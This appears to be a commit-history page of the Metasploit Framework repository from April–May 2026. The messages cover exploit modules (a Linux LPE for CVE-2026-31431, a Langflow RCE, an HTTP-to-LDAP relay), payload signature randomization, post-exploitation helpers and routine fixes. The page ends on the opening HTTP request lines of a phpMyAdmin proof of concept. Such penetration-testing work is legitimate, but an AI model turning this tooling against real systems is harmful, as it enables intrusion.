Compare commits

...

206 Commits

Author SHA1 Message Date
jenkins-metasploit bc5347f464 automatic module_metadata_base.json update
Command Shell Acceptance / cmd windows-2022 (push) Waiting to run
Command Shell Acceptance / linux ubuntu-latest (push) Waiting to run
Command Shell Acceptance / powershell windows-2025 (push) Waiting to run
Command Shell Acceptance / Generate report (push) Blocked by required conditions
LDAP Acceptance / LDAP Acceptance - ubuntu-latest - Ruby 3.2 (push) Waiting to run
LDAP Acceptance / Generate report (push) Blocked by required conditions
Lint / Lint msftidy (3.2) (push) Waiting to run
Meterpreter Acceptance / build (push) Waiting to run
MSSQL Acceptance / mcr.microsoft.com/mssql/server:2019-latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MSSQL Acceptance / mcr.microsoft.com/mssql/server:2022-latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MSSQL Acceptance / Generate report (push) Blocked by required conditions
MySQL Acceptance / mariadb:latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MySQL Acceptance / mysql:latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MySQL Acceptance / Generate report (push) Blocked by required conditions
Postgres Acceptance / postgres:16.2 - ubuntu-latest - Ruby 3.2 (push) Waiting to run
Postgres Acceptance / postgres:9.4 - ubuntu-latest - Ruby 3.2 (push) Waiting to run
Postgres Acceptance / Generate report (push) Blocked by required conditions
SMB Acceptance / build (push) Waiting to run
Verify / Docker Build (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" (push) Waiting to run
2026-05-04 13:49:03 +00:00
Diego Ledda edb6844c8f Merge pull request #21404 from zeroSteiner/feat/cve-2026-31431
Fix ARMLE exec and add to Copy Fail
2026-05-04 09:37:28 -04:00
jenkins-metasploit 909c8df2cf automatic module_metadata_base.json update 2026-05-01 13:50:15 +00:00
adfoster-r7 bbb2452063 Merge pull request #21342 from adfoster-r7/defer-loading-dependencies
Defer loading rex/metasm/octokit/etc dependencies
2026-05-01 14:37:27 +01:00
Spencer McIntyre 0c81638fff Fix ARMLE exec and add to Copy Fail 2026-04-30 20:03:04 -04:00
adfoster-r7 557ff0d068 Defer loading dependencies 2026-05-01 00:07:59 +01:00
jenkins-metasploit 5a2e7bb301 Bump version of framework to 6.4.132 2026-04-30 23:06:36 +00:00
jenkins-metasploit e8bb3cd5fb automatic module_metadata_base.json update 2026-04-30 22:30:05 +00:00
Brendan dc97d1e97e Merge pull request #21395 from zeroSteiner/feat/cve-2026-31431
Add exploit for CVE-2026-31431 (Copy Fail)
2026-04-30 17:19:08 -05:00
Spencer McIntyre 66995d3987 Only allow x64 and AARCH64 for now 2026-04-30 17:51:30 -04:00
Spencer McIntyre cdcdb5fe88 Normalize reported ARMLE architectures from Meterpreter 2026-04-30 17:09:33 -04:00
Spencer McIntyre bc0f7602c2 Only bind the socket once 2026-04-30 17:09:32 -04:00
Spencer McIntyre 0e02f10078 Add support for more architectures 2026-04-30 17:09:32 -04:00
Spencer McIntyre c0e5ceb531 Add an AARCH64 exec payload 2026-04-30 17:09:32 -04:00
Spencer McIntyre a0c5b9a6bc Merge pull request #21315 from cdelafuente-r7/mcp-server
MCP Server, specs and documentation
2026-04-30 16:33:18 -04:00
Spencer McIntyre e14ce079bb Appease rubocop 2026-04-30 15:18:18 -04:00
Spencer McIntyre 22a9dc4522 Add docs 2026-04-30 14:54:09 -04:00
Spencer McIntyre 55f9216698 Finish the exploit check and cleanup methods 2026-04-30 14:39:46 -04:00
jenkins-metasploit e2e210d038 automatic module_metadata_base.json update 2026-04-30 15:40:08 +00:00
cgranleese-r7 a2b57ae998 Merge pull request #21352 from adfoster-r7/improve-checkcode-messages-5
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 16:29:07 +01:00
Spencer McIntyre 12e08fb451 Add an expanded check 2026-04-30 10:54:17 -04:00
adfoster-r7 3bee31ff5e Update checkcodes and bug fixes 2026-04-30 15:42:10 +01:00
Spencer McIntyre d0a205f776 Add the initial LPE exploit 2026-04-30 09:53:35 -04:00
Spencer McIntyre 9f6349de7d Initial commit of updated stub
Stub has been updated to forward arguments to /bin/sh
2026-04-30 09:53:12 -04:00
jenkins-metasploit 5942122b9a automatic module_metadata_base.json update 2026-04-30 10:06:45 +00:00
cgranleese-r7 49ea1a3391 Merge pull request #21359 from adfoster-r7/improve-checkcode-messages-12
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 10:46:41 +01:00
cgranleese-r7 b3fbeced43 Merge pull request #21355 from adfoster-r7/improve-checkcode-messages-8
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 10:44:04 +01:00
cgranleese-r7 7b3aef8ede Merge pull request #21353 from adfoster-r7/improve-checkcode-messages-6
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 10:43:21 +01:00
Christophe De La Fuente 6f3884e832 Redesign the logging capability using Rex::Logging and Rake middleware
- remove the original Logger
- use Rex::Logging with helper methods (dlog, ilog, etc.)
- add `sanitize` configuration option
- create Sanitizing, JsonFlatfile and JsonStream sinks for JSON logging format
- minor updates in apply_default (Loader)
- update the re-authentication logic (fix a specific usecase)
- add a Rack middleware that logs MCP HTTP request/response
- use Rex::Socket::Tcp instead of TcpSocket
- update the ensure_rpc_available for better validation
- use around_request instead of the deprecated SDK instrumentation for logging
- update and add specs
2026-04-30 11:10:09 +02:00
adfoster-r7 b59ced5057 Add human-readable descriptions to CheckCode returns in multi/http exploit modules (A-O) 2026-04-30 00:25:30 +01:00
adfoster-r7 0bf595c2ec Add human-readable descriptions to CheckCode returns in unix/webapp exploit modules 2026-04-30 00:16:04 +01:00
jenkins-metasploit 15a0f6eefd automatic module_metadata_base.json update 2026-04-29 19:30:36 +00:00
Spencer McIntyre 2634142f0d Merge pull request #21323 from jheysel-r7/feat/http_to_ldap
HTTP to LDAP Relay Module
2026-04-29 15:20:10 -04:00
Spencer McIntyre 2153daad7b Update the specs 2026-04-29 14:38:29 -04:00
Jack Heysel 4847d88441 HTTP to LDAP Relay Module and Supporting Libraries
Remove unnecessary code

Remove commented out code

Added documentation

Responded to Spencer and Copilot

Add anonymous identity check

Doc update

Warning suppression

Renamed ldap_client to relayed_connection

Comments
2026-04-29 07:48:42 -07:00
jenkins-metasploit 788aa2abc5 automatic module_metadata_base.json update 2026-04-29 13:18:45 +00:00
Spencer McIntyre 2cfdfcba60 Merge pull request #21392 from dwelch-r7/skip-windows-test-on-non-windows-system
skip Windows-specific tests on non-Windows platforms
2026-04-29 09:08:03 -04:00
dwelch-r7 bcae34ee4f Update test/modules/post/test/cmd_exec.rb
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
2026-04-29 13:11:06 +01:00
Dean Welch 6df54a639e skip Windows-specific tests on non-Windows platforms 2026-04-29 13:05:17 +01:00
jenkins-metasploit 41a937c70c automatic module_metadata_base.json update 2026-04-27 11:20:38 +00:00
adfoster-r7 63f4f358c7 Merge pull request #21092 from sjanusz-r7/fix-macos-mingw-syscall_inject-compilation
Fix syscall_inject compilation errors on MacOS with MinGW 15
2026-04-27 12:09:19 +01:00
adfoster-r7 1e3727ba87 Add human-readable descriptions to CheckCode returns in remaining multi exploit modules 2026-04-25 10:52:11 +01:00
jenkins-metasploit e909b9218b Bump version of framework to 6.4.131 2026-04-25 08:54:14 +00:00
adfoster-r7 d121ff6a62 Merge pull request #21307 from adfoster-r7/improve-vuln-and-vuln-attempt-tracking
Improve vuln and vuln attempt tracking
2026-04-24 18:36:28 +01:00
adfoster-r7 e00515c172 Update logic for aux modules having called report_vuln already 2026-04-24 16:26:49 +01:00
adfoster-r7 3ecbadd032 Improve vuln and vuln attempt tracking 2026-04-24 16:26:49 +01:00
cgranleese-r7 7c4f15a024 Merge pull request #21354 from adfoster-r7/improve-checkcode-messages-7
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 16:13:19 +01:00
adfoster-r7 7479078bf1 Merge pull request #21356 from adfoster-r7/improve-checkcode-messages-9
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 15:25:45 +01:00
adfoster-r7 b09686efaf Merge pull request #21357 from adfoster-r7/improve-checkcode-messages-10
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 15:25:19 +01:00
adfoster-r7 b765db798e Merge pull request #21358 from adfoster-r7/improve-checkcode-messages-11
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 15:25:00 +01:00
Simon Janusz aa14df9b6c Merge pull request #21368 from sjanusz-r7/change-php-payload-size
Change PHP payload die func message
2026-04-24 13:47:19 +01:00
adfoster-r7 1d1c284619 Merge pull request #21364 from sjanusz-r7/update-payload-cached-sizes-on-new-metadata-cache
Update payload cached sizes when creating new module metadata cache
2026-04-24 11:15:55 +01:00
sjanusz-r7 a153814b0f Change PHP payload die func message 2026-04-24 11:08:38 +01:00
jenkins-metasploit 17f7f4d718 Bump version of framework to 6.4.130 2026-04-23 15:02:38 +00:00
jenkins-metasploit 74468290c9 automatic module_metadata_base.json update 2026-04-23 14:54:17 +00:00
Spencer McIntyre 540139cd4a Merge pull request #21341 from g0tmi1k/smb
Fix various smb/samba issues
2026-04-23 10:45:58 -04:00
adfoster-r7 370c35c1e2 Add human-readable descriptions to CheckCode returns in windows/http exploit modules 2026-04-23 15:37:09 +01:00
jenkins-metasploit cb1cfbbe98 automatic module_metadata_base.json update 2026-04-23 14:21:28 +00:00
Brendan 2289fc07ce Merge pull request #21260 from Takahiro-Yoko/langflow_rce_cve_2026_27966
Add Langflow RCE module (CVE-2026-27966)
2026-04-23 09:12:12 -05:00
cgranleese-r7 107edff1cb Merge pull request #21278 from adfoster-r7/fix-msftidy-heading-in-codeblock-edgecase
Fix msftidy heading in codeblock edgecase
2026-04-23 13:23:55 +01:00
jenkins-metasploit 4521c9f3d3 automatic module_metadata_base.json update 2026-04-23 12:03:13 +00:00
g0t mi1k 76cae04e91 smb_login: Add report_service (regardless of RECORD_GUEST)
RECORD_GUEST = creds, not service
2026-04-23 12:59:19 +01:00
g0t mi1k 4f77df25ba smb_uninit_cred: Add report_service 2026-04-23 12:59:19 +01:00
g0t mi1k 792a4254ac smb_uninit_cred: Print correct port 2026-04-23 12:59:19 +01:00
g0t mi1k eb5b5a1277 smb_uninit_cred: Rex::Proto::DCERPC::Exceptions::Fault DCERPC FAULT => nca_op_rng_error 2026-04-23 12:59:18 +01:00
g0t mi1k 950fb9def6 smb_lookupsid: Hide table if results empty 2026-04-23 12:59:18 +01:00
g0t mi1k 2e58eb1207 psexec_loggedin_users: NoMethodError. undefined method `each_line' for false 2026-04-23 12:59:18 +01:00
g0t mi1k a173ea15fa smb_version: Remove duplicated report_service 2026-04-23 12:59:18 +01:00
g0t mi1k 3c1b245751 Fix #21339: NoMethodError undefined method `each' for an instance of String 2026-04-23 12:59:18 +01:00
g0t mi1k ca27731285 Fix #21338: NoMethodError undefined method `domain_handle' for nil 2026-04-23 12:59:18 +01:00
g0t mi1k 2d93669f56 Fix #21337: NoMethodError: undefined method `empty?' for nil 2026-04-23 12:59:18 +01:00
cgranleese-r7 1142d4e15d Merge pull request #21351 from adfoster-r7/improve-checkcode-messages-4
Add human-readable descriptions to CheckCode returns modules
2026-04-23 12:54:31 +01:00
adfoster-r7 96a37da14a Add human-readable descriptions to CheckCode returns in multi/http exploit modules (P-Z) 2026-04-23 12:26:32 +01:00
sjanusz-r7 f00bbe6451 Update payload cached sizes when creating new module metadata cache 2026-04-23 12:06:09 +01:00
jenkins-metasploit f1778187b8 automatic module_metadata_base.json update 2026-04-23 11:04:15 +00:00
cgranleese-r7 9ad8b7ac32 Merge pull request #21360 from adfoster-r7/improve-checkcode-messages-13
Add human-readable descriptions to CheckCode returns in modules
2026-04-23 11:55:46 +01:00
jenkins-metasploit 8a5d7be47a automatic module_metadata_base.json update 2026-04-23 10:45:19 +00:00
cgranleese-r7 591dbdd821 Merge pull request #21350 from adfoster-r7/improve-checkcode-messages-3
Add human-readable descriptions to CheckCode returns in modules
2026-04-23 11:33:27 +01:00
adfoster-r7 c38f6b4858 Update checkcodes and bug fixes 2026-04-23 10:20:53 +01:00
adfoster-r7 3e61396ec2 Add human-readable descriptions to CheckCode returns in unix, freebsd, osx, and other exploit modules 2026-04-23 10:02:22 +01:00
jenkins-metasploit e5bdc50a4f automatic module_metadata_base.json update 2026-04-22 20:35:33 +00:00
Spencer McIntyre 44d60c0865 Merge pull request #21347 from g0tmi1k/smb_version
smb_version: Make SMBv1 happy
2026-04-22 16:27:08 -04:00
adfoster-r7 2ae936473e Add human-readable descriptions to CheckCode returns in remaining windows exploit modules 2026-04-22 18:44:55 +01:00
adfoster-r7 45bc95a876 Add human-readable descriptions to CheckCode returns in windows/local exploit modules 2026-04-22 18:43:59 +01:00
adfoster-r7 aaf536d189 Merge pull request #21361 from sjanusz-r7/payload-cache-size-changes
Comment out payload size cache tests
2026-04-22 17:13:23 +01:00
sjanusz-r7 8587d1c211 Skip payload cached size specs 2026-04-22 16:31:51 +01:00
adfoster-r7 05befe18b1 Add human-readable descriptions to CheckCode returns in linux/local exploit modules 2026-04-22 15:06:59 +01:00
jenkins-metasploit 7851cda71d automatic module_metadata_base.json update 2026-04-22 13:49:02 +00:00
cgranleese-r7 380911db97 Merge pull request #21349 from adfoster-r7/improve-checkcode-messages-2
Add human-readable descriptions to CheckCode returns in modules
2026-04-22 14:32:05 +01:00
cgranleese-r7 de636c1457 Merge pull request #21348 from adfoster-r7/improve-checkcode-messages-1
Add human-readable descriptions to CheckCode returns in modules
2026-04-22 14:30:48 +01:00
adfoster-r7 f3b07d5a49 Add human-readable descriptions to CheckCode returns in auxiliary and post modules 2026-04-22 13:56:54 +01:00
adfoster-r7 2cbb3942b6 Add human-readable descriptions to CheckCode returns in linux/http exploit modules (A-M) 2026-04-22 13:08:59 +01:00
g0t mi1k b7f136077e smb_version: Be more verbose - show smb1 if possible 2026-04-22 13:08:20 +01:00
g0t mi1k 0474c0ce24 smb_version: Add spacing between : 2026-04-22 13:08:20 +01:00
g0t mi1k 1d9c922488 Make smb_version happy with smbv1 2026-04-22 13:08:19 +01:00
cgranleese-r7 25d7c25ad8 Merge pull request #21346 from adfoster-r7/fix-false-positive-on-couchdb-enum-check
Fix false positive on couchdb enum check
2026-04-22 12:38:47 +01:00
adfoster-r7 19d333df13 Add human-readable descriptions to CheckCode returns in linux/http exploit modules (N-Z) 2026-04-22 11:55:15 +01:00
adfoster-r7 6e992aa6ed Fix false positive on couchdb enum check 2026-04-21 22:48:27 +01:00
jenkins-metasploit 9efc727462 automatic module_metadata_base.json update 2026-04-21 17:21:45 +00:00
Christophe De La Fuente 4c0f2c29bc Merge pull request #21019 from g0tmi1k/phpmyadmin_config 2026-04-21 19:13:04 +02:00
jenkins-metasploit 9692b8865f automatic module_metadata_base.json update 2026-04-21 17:08:11 +00:00
Spencer McIntyre 6a00ea38c6 Merge pull request #21306 from dledda-r7/feat/block-api-randomization
Block Api ROR13 IV randomization
2026-04-21 12:58:30 -04:00
Christophe De La Fuente 946d1a44b5 Fix Notes format (array) 2026-04-21 18:43:54 +02:00
jenkins-metasploit cca7166eb4 automatic module_metadata_base.json update 2026-04-21 15:05:42 +00:00
adfoster-r7 a918184416 Merge pull request #21344 from adfoster-r7/fix-elasticsearch-traversal-check-support
Fix elasticsearch traversal check support
2026-04-21 15:57:26 +01:00
adfoster-r7 81f1a7c86a Fix elasticsearch traversal check support 2026-04-21 15:18:58 +01:00
adfoster-r7 97ab01cddd Merge pull request #21340 from dledda-r7/ci/disable-meterpreter-ci
Disable Windows Server 2022 CI
2026-04-21 15:01:35 +01:00
dledda-r7 b9573fa0ce ops(meterpreter): disable windows server 2022 build until 141_xp dependency is removed 2026-04-21 05:55:29 -04:00
dledda-r7 e40422845b fix: block_api.rb update 2026-04-21 05:43:34 -04:00
Spencer McIntyre 20065b3f3d Fix the include errors 2026-04-20 18:36:00 -04:00
Spencer McIntyre 44a45ffdbf Switch to Rex::Logging 2026-04-20 18:14:56 -04:00
Brendan 2dbfcfb918 Merge pull request #21232 from bcoles/file-find_writable_directories
Add find_writable_directories to Msf::Post::File
2026-04-20 16:33:53 -05:00
jenkins-metasploit ae63cb9b1d automatic module_metadata_base.json update 2026-04-20 20:41:14 +00:00
Brendan 6b57b4c66f Merge pull request #21256 from g0tmi1k/webdav
WebDAV improvements
2026-04-20 15:30:43 -05:00
Christophe De La Fuente 820e737024 Update from code review and some fixes
- add the `--mcp-transport` option
- prefix the MCP env. variable with `MSF_`
- move the code under `lib/msf/core/mcp/`
- move specs under `spec/lib/msf/core/mcp/`
- change the namespace from `MsfMcp` to `Msf::RPC`
- update the `lib/msf_autoload.rb` to exclude the mcp-related files
- add missing validation for the `mcp`, `rate_limit and `logging` sections in the config file
- remove duplicate error exception classes
- fix an error in the transformers related to the `created_at` field
- fix a small issue in the input validator when regex are used
- update the way error is reported for MCP Tools to be compatible with the changes in the new `mcp` gem
- update and add specs
2026-04-20 18:29:21 +02:00
adfoster-r7 bd2e11ad55 Merge pull request #21331 from bcoles/metadata-obj
Metadata::Obj: Deduplicate notes hash strings and memoize `Obj#path` to reduce retained memory in the module metadata cache
2026-04-20 16:55:33 +01:00
jenkins-metasploit 6acac8e120 automatic module_metadata_base.json update 2026-04-20 13:31:53 +00:00
cgranleese-r7 a53d0a027b Merge pull request #21332 from adfoster-r7/remove-false-positive-from-nodejs-pipelining-check
Remove false positive from nodejs pipelining check
2026-04-20 14:22:23 +01:00
Diego Ledda 46553b5984 Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-20 15:19:47 +02:00
Diego Ledda 5622bd254b Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-20 15:19:07 +02:00
Diego Ledda 2c58825343 Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-20 15:18:54 +02:00
adfoster-r7 f060acd1e9 Remove false positive from nodejs pipelining check 2026-04-20 14:02:56 +01:00
bcoles 09bb98d13e Memoize Obj#path to avoid repeated File.join
The install_root path is immutable at runtime, so cache the computed
full path on first access instead of calling File.join on every call.
2026-04-20 22:19:55 +10:00
bcoles 76a7f61465 Deduplicate notes hash keys and values in metadata Obj
Notes keys ("Stability", "SideEffects", "Reliability") and values
("crash-safe", "ioc-in-logs", etc.) are repeated across thousands of
modules. Use frozen string dedup (-str) to share a single object per
unique string, reducing ~24K string allocations to ~185 shared objects.
2026-04-20 22:17:40 +10:00
adfoster-r7 e09a38085c Merge pull request #21330 from bcoles/modules-loader
Replace Pathname with string prefix removal in directory module loader
2026-04-20 11:45:33 +01:00
adfoster-r7 fe1aeb9279 Merge pull request #21329 from bcoles/modulemanager-cache
Simplify get_parent_path with rindex instead of split/join
2026-04-20 11:30:04 +01:00
adfoster-r7 9b985dc1ef Merge pull request #21327 from tair-m/master
Fix uninitialized constant HTTP::CookieJar by correcting load order in http_cookie_jar.rb
2026-04-20 10:39:02 +01:00
bcoles a8ccdfc1e4 Simplify get_parent_path with rindex instead of split/join
Replace File.join + String#split + array slice + Array#join with a
single String#rindex lookup. This avoids allocating intermediate arrays
and strings on every call (once per cached module during startup).
2026-04-20 18:22:53 +10:00
bcoles b1c4fd3f39 Replace Pathname with string prefix removal in directory module loader
Msf::Modules::Loader::Directory#each_module_reference_name created two
Pathname objects per module file and called relative_path_from to derive
the module reference name. With ~5,000 module files this produced
~170,000 calls to Pathname#chop_basename internally.

Since Rex::Find.find always yields absolute paths rooted at
full_entry_path, simple String#delete_prefix achieves the same result
without allocating Pathname objects.
2026-04-20 18:14:54 +10:00
Takah1ro f54374eaff Update exploit to improve stability 2026-04-18 12:56:53 +09:00
tair 4607741a16 Fix LoadError in http_cookie_jar for Ruby 3.3.0 2026-04-18 07:17:26 +05:00
g0t mi1k 94b4f577e0 WebDAV: MR feedback 2026-04-17 22:19:26 +01:00
jenkins-metasploit 046ba861b3 automatic module_metadata_base.json update 2026-04-17 16:21:38 +00:00
jheysel-r7 08f6dc20a5 Merge pull request #21122 from bootstrapbool/camaleon_cms_cve_2024_46987
Camaleon CMS CVE 2024 46987
2026-04-17 09:13:07 -07:00
Takah1ro a47234778c Increase WfsDelay 2026-04-17 23:54:43 +09:00
adfoster-r7 92af54c885 Merge pull request #21230 from bcoles/obj-dedup-cache
Reduce memory footprint of module metadata Obj instances
2026-04-17 12:33:23 +01:00
adfoster-r7 19112a0212 Merge pull request #21231 from bcoles/msf-module-cache
Module metadata: Fix stale module detection and add per-type metadata index
2026-04-17 11:25:44 +01:00
dledda-r7 679d2a9a4e feat: enhance block_api_iv handling with warnings and options for payload methods 2026-04-17 06:07:18 -04:00
bcoles 785307f55e Module metadata: Fix stale module detection and add per-type metadata index 2026-04-17 19:41:18 +10:00
dledda-r7 82c8028f1c refactor: remove redundant block_api_iv calls in payload generation methods 2026-04-17 05:38:19 -04:00
Diego Ledda 9d81fe0f2e Apply suggestion from @smcintyre-r7
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-17 11:26:11 +02:00
Diego Ledda b3ef4db890 Apply suggestion from @smcintyre-r7
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-17 11:25:14 +02:00
Diego Ledda 2af3bbf34e Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-17 11:23:28 +02:00
Takah1ro 3cfbb90b0f Fix bug 2026-04-17 07:31:25 +09:00
Takahiro Yokoyama 4c5ed36c88 Update modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2026-04-17 07:10:53 +09:00
Christophe De La Fuente 04ffe3ce3b MCP Server, specs and documentation 2026-04-16 19:31:35 +02:00
bcoles 6821066217 Add find_writable_directories to Msf::Post::File
Add a method to discover writable directories on Unix targets using the
`find` command. This is useful in post-exploitation scenarios where a
module needs to locate a writable staging path.

Parameters:
- path: base directory to search (default: /)
- max_depth: find -maxdepth limit (default: 2)
- timeout: maximum seconds for cmd_exec to wait (default: 15)

Raises on Windows sessions. Returns an array of absolute paths, or nil
on failure. Non-absolute lines (e.g. find error messages) are filtered
from the output.
2026-04-17 02:31:19 +10:00
jenkins-metasploit 37ff9f8530 automatic module_metadata_base.json update 2026-04-16 16:00:17 +00:00
adfoster-r7 e7c5e0e4a3 Merge pull request #21238 from bcoles/loongarch64-chmod
Add Linux LoongArch64 chmod payload
2026-04-16 16:51:00 +01:00
adfoster-r7 0644f27cb6 Add module documentation, tests, and misc feedback 2026-04-16 16:18:46 +01:00
jenkins-metasploit 2b37cbe35e Bump version of framework to 6.4.129 2026-04-16 13:29:17 +00:00
Takah1ro 4973d666ff Relocate json to an external file 2026-04-16 21:57:07 +09:00
dledda-r7 953d0343dd fix: updated cache size after blockapi changes 2026-04-16 08:50:42 -04:00
dledda-r7 a50041b697 feat: update register usage for block API calls to use r10d in various payloads 2026-04-16 08:37:32 -04:00
Takahiro Yokoyama b917de89c3 Merge branch 'rapid7:master' into langflow_rce_cve_2026_27966 2026-04-16 20:58:02 +09:00
dledda-r7 340a72438b feat: refactor exit function handling to use block_api_hash 2026-04-16 04:24:44 -04:00
dledda-r7 2be47dbe9c feat: change exitfunc_helper to be accessible 2026-04-16 04:24:44 -04:00
dledda-r7 b8f8366ff1 docs: adding small comment to call out block api randomization 2026-04-16 04:24:43 -04:00
dledda-r7 1f8bb3b52a feat: refactor exit function handling to use helper method for block api randomization 2026-04-16 04:24:43 -04:00
dledda-r7 3233e3c011 feat: block api iv randomization in PrependMigrate 2026-04-16 04:24:43 -04:00
dledda-r7 8a63392284 feat: block api randomization for x86 payloads 2026-04-16 04:24:42 -04:00
dledda-r7 a54f29f02b feat: block api randomization for x64 payloads 2026-04-16 04:24:42 -04:00
dledda-r7 ab0fdf96f8 feat: block api randomization for windows/x64/reverse_tcp 2026-04-16 04:24:41 -04:00
BootstrapBool d530230b5f Reflects module name change in documentation. 2026-04-15 16:16:16 -04:00
BootstrapBool f52184a566 Renames module
Places rails version check after downgrading concurrent-ruby
2026-04-15 16:07:15 -04:00
bootstrapbool 1bbfb699e1 Ensure curl
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-04-15 15:49:49 -04:00
bootstrapbool eddd3fecff Always output logs pertaining to version
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-04-15 15:48:40 -04:00
bootstrapbool 5d5896d3a1 Formatting Fix/Improvement 2026-04-14 19:18:54 +00:00
bootstrapbool fcdb16e69a Document setup process for Camaleon CMS 2026-04-14 19:12:56 +00:00
g0t mi1k 9f480e55d5 phpmyadmin_config: Misc feedback updates
Sorry, it's all thrown into one big commit rather than split up.
2026-04-14 16:35:13 +01:00
g0t mi1k 71f37467d7 http_login: Make rubocop happy 2026-04-14 06:28:55 +01:00
g0t mi1k 3fea1d279d http_login: Be more verbose 2026-04-14 06:28:55 +01:00
g0t mi1k 8bb476a7f5 WebDAV: Misc formatting 2026-04-14 06:28:55 +01:00
g0t mi1k d2ea521ba3 WebDAV: Add check() function 2026-04-14 06:28:45 +01:00
adfoster-r7 9dbea3d5e2 Fix msftidy heading in codeblock edgecase 2026-04-13 13:51:28 +01:00
sjanusz-r7 4281e713a0 Fix syscall_inject compilation errors on MacOS with MinGW 15 2026-04-13 10:25:27 +01:00
BootstrapBool dc82a22939 Removes unnecessary print 2026-04-11 20:41:54 -04:00
BootstrapBool 8684cec986 Corrects check method 2026-04-11 20:28:28 -04:00
BootstrapBool d441c07408 Corrects documentation
Removes unnecessary options

Removes credentials from logs

Refactors check method

Makes use of Rex::Version

Removes get_base_url in favor of relative filepaths in send_request_cgi

Other small changes
2026-04-11 19:31:22 -04:00
Takah1ro 2f15039985 Lint formatting 2026-04-10 23:44:26 +09:00
Takah1ro 4dcf67865a minor change 2026-04-09 22:18:01 +09:00
Takah1ro a6d7502c8d Add langflow_rce_cve_2026_27966 module 2026-04-09 22:12:10 +09:00
g0t mi1k 4f38ec3393 WebDAV: Improve response 2026-04-08 17:03:16 +01:00
g0t mi1k 0f4db29f2b WebDAV: Creds is optional 2026-04-08 17:03:16 +01:00
g0t mi1k 328c2e5845 WebDAV: Update workspace 2026-04-08 17:03:16 +01:00
g0t mi1k 918281a5dc WebDAV: Clean up after exploiting 2026-04-08 17:03:16 +01:00
g0t mi1k 6603450572 WebDAV: PATH -> URI 2026-04-08 17:03:16 +01:00
g0t mi1k 2979dafdf4 WebDAV: Make rubocop happy 2026-04-08 17:03:07 +01:00
g0t mi1k 437b8a7cf6 WebDAV isn't just for Windows 2026-04-08 16:36:35 +01:00
bcoles 6ba950c526 Add Linux LoongArch64 chmod payload 2026-04-06 11:40:14 +10:00
bcoles 235da57b97 Module metadata: string dedup, shared empty containers, platform caching 2026-04-04 12:14:17 +11:00
bcoles 3ac30e09cc Module metadata: string dedup, shared empty containers, platform caching 2026-04-04 11:54:38 +11:00
g0t mi1k 38d8ea7937 phpmyadmin_config: Make rubocop happy 2026-03-31 14:49:03 +01:00
g0t mi1k e025f94f78 phpmyadmin_config: Add report_service() support 2026-03-31 07:07:49 +01:00
g0t mi1k 3a1d34e300 phpmyadmin_config: Ordering matters (check vs exploit) 2026-03-31 07:07:49 +01:00
g0t mi1k 18e4c8e28d phpmyadmin_config: Misc ruby format tweaks
This is based on MR feedback
2026-03-31 07:07:49 +01:00
g0t mi1k 8938ee75e5 phpmyadmin_config: Another <= v3.1.3.1 (CVE-2009-1285)
CVE-2009-1285 has two vulns for v3.1.x

## PoC

```
POST /setup/config.php?type=post HTTP/1.1
Host: 127.0.0.1:8083
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
